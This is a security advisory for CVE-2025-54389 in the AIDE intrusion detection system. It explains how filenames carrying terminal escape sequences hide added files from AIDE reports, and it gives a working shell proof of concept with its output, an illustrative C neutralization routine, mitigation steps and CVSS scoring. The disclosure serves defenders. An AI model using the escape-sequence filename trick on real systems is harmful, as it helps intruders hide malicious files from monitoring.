aide (<= 0.19.1): improper output neutralization (potential AIDE detection bypass)

Moderate
hvhaugwitz published GHSA-522j-vvx9-gg28 Aug 14, 2025

Package

aide

Affected versions

<= 0.19.1

Patched versions

0.19.2

Description

Summary

Rajesh Pangare discovered an improper output neutralization vulnerability in
AIDE, an advanced intrusion detection system. An attacker can craft a malicious
filename by including terminal escape sequences to hide the addition or removal
of the file from the report and/or tamper with the log output. A local user
might exploit this to bypass the AIDE detection of malicious files.
Additionally, the output of extended attribute key names and symbolic link
targets is also not properly neutralized.

Project

AIDE (https://aide.github.io)

Affected versions

AIDE <= 0.19.1

CVE ID

CVE-2025-54389

Proof of concept

$ mkdir test
$ touch test/$(echo -e 'malicious-file\033[1A')
$ touch test/regular-testfile
$ aide --config <(printf -- "database_in=file:/dev/null\nroot_prefix = ./test\n/ R") --check
Start timestamp: 2025-08-10 07:23:25 +0000 (AIDE 0.19.1)
AIDE found differences between database and filesystem!!
Root prefix: ./test

Summary:
  Total number of entries:      3
  Added entries:                3
  Removed entries:              0
  Changed entries:              0

---------------------------------------------------
Added entries:
---------------------------------------------------

d++++++++++++++++++: /
f++++++++++++++++++: /regular-testfile

---------------------------------------------------
The attributes of the (uncompressed) database(s):
---------------------------------------------------

/dev/null
 SHA256    : 47DEQpj8HBSa+/TImW+5JCeuQeRkm5NM
             pJWZG3hSuFU=
 SHA512    : z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXc
             g/SpIdNs6c5H0NE8XYXysP+DGNKHfuwv
             Y7kxvUdBeoGlODJ6+SfaPg==
 STRIBOG256: P1OaIT6XyALMIp1HTGqjKoJaNgsqkzqU
             n9klII2c4bs=
 STRIBOG512: jpRdogmqhp8EVZKFKbyuRnnphzq3B7VT
             FfVs65i+8Kc2L3FVKDVu6DzaXyqsTGrS
             ujpxXBvNgcuOn5C/TBwaig==
 SHA512/256: xnK40e9W7Sirh8NiLFEUBpvdOte4+XN0
             mNDAHs7wlno=
 SHA3-256  : p//G+L8e12ZRwUdWoGHWYvWA/03kO0n6
             gtgKS4D4Q0o=
 SHA3-512  : pp9zzKI6msXItWfcGFp1bpfJghZP4lhZ
             4NHcwUdcgKYVshI68fX5TBHj6UAsOsVY
             9QAZnZW20+MBdYWGKB3NJg==


End timestamp: 2025-08-10 07:23:25 +0000 (run time: 0m 0s)

The output correctly shows the addition of regular-testfile but misses the
addition of the malicious file.

This works because the terminal escape sequence moves the cursor one line up
before the new line character of the regular output moves the cursor back to
the beginning of the line containing the malicious file; the next added entry
then overwrites the line.

Please note that the number of added entries is unchanged in the report. For
this POC a user might notice the difference between the number of added entries
and the list of added entries shown in the report, but with a much higher number
of added files the deviation is likely overlooked.

Analysis

The vulnerability is caused by missing output neutralization before printing
the filename, symbolic link target or extended attribute key name to the report
and log output.

This allows a user to craft a filename, symbolic link target or extended
attribute key name including control characters to tamper with or overwrite
previous output.
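As an added illustration of the missing neutralization step (this is not AIDE's own code or its patch), the following C routine replaces every control byte in a filename, symbolic link target or extended attribute key name with a visible \xHH escape before the name is printed, so a crafted entry can no longer move the cursor or overwrite earlier report lines. The sample input is the filename from the proof of concept above; the function name and buffer handling are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Copy `name` into `out` (capacity `outlen`), replacing each control byte
 * (0x00-0x1f and 0x7f, which covers ESC and hence all terminal escape
 * sequences) with a visible "\xHH" and each literal backslash with "\\",
 * so an escaped name cannot be confused with a name that was already safe.
 * Returns the number of control bytes that were escaped (0 means the name
 * was printed unchanged), or -1 if `out` is too small. `out` is always
 * NUL-terminated when outlen > 0. */
int neutralize_name(const char *name, char *out, size_t outlen)
{
    size_t o = 0;
    int escaped = 0;

    if (outlen == 0)
        return -1;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++) {
        if (*p < 0x20 || *p == 0x7f) {
            if (o + 4 >= outlen) { out[o] = '\0'; return -1; }
            snprintf(out + o, 5, "\\x%02x", *p);   /* 4 chars + NUL */
            o += 4;
            escaped++;
        } else if (*p == '\\') {
            if (o + 2 >= outlen) { out[o] = '\0'; return -1; }
            out[o++] = '\\';
            out[o++] = '\\';
        } else {
            if (o + 1 >= outlen) { out[o] = '\0'; return -1; }
            out[o++] = (char)*p;
        }
    }
    out[o] = '\0';
    return escaped;
}

int main(void)
{
    /* Constructed sample: the crafted filename from the proof of concept
     * (ESC [ 1 A moves the cursor one line up on a terminal). */
    const char *poc = "malicious-file\033[1A";
    char safe[128];
    int n = neutralize_name(poc, safe, sizeof safe);

    /* A non-zero count is also a useful signal: a name that needed escaping
     * is worth flagging in the report rather than silently cleaned up. */
    printf("f++++++++++++++++++: /%s  (escaped %d control byte(s))\n", safe, n);
    return 0;
}
```

Printed to a terminal, the escaped line stays visible as /malicious-file\x1b[1A instead of being overwritten by the next entry.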

Mitigation

Upgrade to AIDE v0.19.2 [v0.19.2]

If you cannot upgrade, the issue can be mitigated by configuring AIDE to write
the report output to a regular file (e.g. report_url=file:/var/log/aide.log)
or by redirecting stdout to a regular file. Additionally, consider redirecting
the log output written to stderr to a regular file. Make sure to open the
generated files with a program that escapes terminal sequences correctly.

[v0.19.2] https://github.com/aide/aide/releases/tag/v0.19.2

Credit

The issue was reported by Rajesh Pangare.

Severity

Moderate


CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None

CVSS vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Weaknesses

No CWEs
